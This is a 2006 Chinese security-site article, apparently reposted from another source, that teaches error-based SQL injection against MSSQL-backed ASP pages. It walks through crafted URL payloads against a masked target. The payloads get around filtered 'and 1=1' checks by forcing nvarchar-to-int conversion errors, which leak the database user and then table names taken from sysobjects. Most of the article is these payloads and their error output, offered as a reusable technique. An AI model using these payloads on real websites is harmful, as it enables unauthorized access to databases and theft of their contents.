通行证: 用户 密码 域名空间  下载中心 社区论坛 信息公告 my小屋
联系我们
设为首页
加入收藏

 

qq,asp,php,jsp,xml,sql,.net,编程 程序 网页图象 建站经验 私服
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿
论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图
专题 | 应用软件 | 聊天通讯 | q q 专栏 | 建站经验 | 在线工具 | 站长club | 注 册 表 | 旧版
社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 网络赚钱 | 网站地图 | 广告服务 | 服务
当前位置:首页>>网络安全>>安全防范>>正文 新版上线![旧版]
注:打开慢时请稍等
灵活地运用sql injection做数据库渗透

http://www.iyit.net  日期:2006-5-8 9:15:15  来源:中国站长学院  点击:
参加讨论】    对于很多的mssql数据库,要进行注入需要灵活的技巧与思路,就有如在第一篇文章里所提到的逻辑判断法。 有时候,一个注入点的判断不是单纯靠and 1=1和and 1=2的,就有如这网站:

http://www.xxxxx.com/view_topic.asp?maintopicid=m10-1&topicid=m10-25

加个" ' "符号在后面,

http://www.xxxxx.com/view_topic.asp?maintopicid=m10-1&topicid=m10-25'

出错信息如下,

unclosed quotation mark before the character string 'm10-25''

好,应该是注入点了,再试and 1=1,

http://www.xxxxx.com/view_topic.asp?maintopicid=m10-1&topicid=m10-25'%20and%20'1'='1

是正常画面,再试and 1=2,

http://www.xxxxx.com/view_topic.asp?maintopicid=m10-1&topicid=m10-25'%20and%20'1'='2

还是正常画面,看来是逻辑判断被过滤了,是不是不能注入了呢?然而,逻辑判断能被过滤,执行错误可不能被过滤。在unclosed quotation mark的前提下,我们先让它出错,然后再加个逻辑判断给它过滤和关掉那个" ' "符号。好,思路是这样,就提交这样的语句:

http://www.xxxxx.com/view_topic.asp?maintopicid=m10-1&topicid=m10-25'%20and%20user>0%20and%20'1'='1

出错信息如下,

syntax error converting the nvarchar value 'dbo' to a column of data type int

看到吧,成功了。所以下次当逻辑判断被过滤了,就利用它再结合执行错误来进行注入好了。
再试这语句,

http://www.xxxxx.com/view_topic.asp?maintopicid=m10-1&topicid=m10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype='u'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1

出错信息是,

syntax error converting the nvarchar value 'tusers' to a column of data type int

好,第一个表名是'tusers'

再来,

http://www.xxxxx.com/view_topic.asp?maintopicid=m10-1&topicid=m10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%202%20name%20from%20sysobjects%20where%20xtype='u'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1

这次的出错信息是,

syntax error converting the nvarchar value 'ttechnical' to a column of data type int

第二个表名是'ttechnical'

好了,就试到这里为止。共勉之。


编辑:黑鹰 [发送给好友] [打印本页] [关闭窗口] [返回顶部]
上一篇:妙用代理渗透内网
下一篇:网页病毒源码解析
转载请注明来源:www.iyit.net
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
 相关文章
跨站式sql注入技巧 web环境下sql注入攻击的检测与防御 利用instr()函数防止sql注入攻击
九大措施安全配置sqlserver2000 防范sql指令植入式攻击(2) 防范sql指令植入式攻击(1)
数据库安全:sql server 中系统表的作用 sql server防范措施(2) sql server防范措施(1)
从iis到sql server数据库安全 sql server数据库安全规划全攻略(2) sql server数据库安全规划全攻略(1)
突破sql错误提示上传webshell 恢复sql server系统数据库 sqlserver取得网站路径的几种方法以及比
sqlserver取得网站路径的几种方法以及比 hdsi2.0 sql注入部分抓包(4) hdsi2.0 sql注入部分抓包(3)
hdsi2.0 sql注入部分抓包(2) hdsi2.0 sql注入部分抓包(1) iis服务、asp.net引擎以及sqlserver的安
蓝雨设计整站sql注入漏洞 如何灵活地运用sql injection做数据库渗 从iis转到sql数据库安全
最新更新 热点排行 推荐新闻
服务器安全设置(七)
服务器安全设置(六)
服务器安全设置(五)
服务器安全设置(四)
服务器安全设置(三)
网站服务器通用和专用保护方法比较分析
网站服务器通用和专用保护方法比较分析
跨站式sql注入技巧
全面解析“网络钓鱼”式攻击
揭开网络钓鱼(phishing)秘密
google hacking的实现以及应用(下)
google hacking的实现以及应用(上)
网络最经典命令行-网络安全工作者的必
刍议ipv6的安全问题
鲜为人知的“windows 2000/xp受限”问
上网服务器步步建
网络安全问题的讨论和对策
ie浏览器再爆漏洞恐怖数据库成硬盘杀手
winxp漏洞可诱发dos攻击微软正在赶制补
操作系统被入侵后的修复过程
新开放qq免费挂级网站
免费在qq上看在线电影电视听音乐
免费把qq炫铃设为本机qq的系统提示音
qq珊瑚虫外挂4.0版本发布!
腾讯qq调整升级条件不再诱发网民“通宵
优秀公益广告作品欣赏(8)
java数据类型转换
流金岁月!cpu历史上最难忘的十个第一
qq挂机的n种快速方法
asp自动解压rar文件
操作系统被入侵后的修复过程
巧用photoshop图案工具
用photoshop制成浪漫的“珍珠项链”
第二十章 开发delphi对象式数据管理功
sql简明教程(1)
vbscript和javascript互相调用 
jsp教程(四)-jsp actions的使用
操作系统被入侵后的修复过程
五一别忘电脑防毒 养成良好上网习惯
google对ie浏览器将捆绑搜索功能表担忧
新版上线,今日正式开通!!!
 友情链接
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接
copyrights © 2004-2006 iyit.net all rights reserved.
网站合作、广告联系qq:147007642、466949678
易特网络技术 点击这里给我发消息